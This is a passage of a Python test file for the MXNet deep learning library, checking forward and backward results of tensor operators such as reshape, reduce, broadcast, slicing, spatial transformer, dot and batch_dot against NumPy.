impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0].asnumpy(), groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd.asnumpy(), grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad.asnumpy(), grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
dtypes = ['float32', 'float64']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'].asnumpy(),
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
